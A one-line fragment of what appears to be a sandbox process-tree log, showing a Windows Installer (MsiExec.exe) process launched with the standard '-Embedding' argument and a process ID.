C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B630AE07EBF19412004C743F453EA5A3 C2⤵PID:5472
-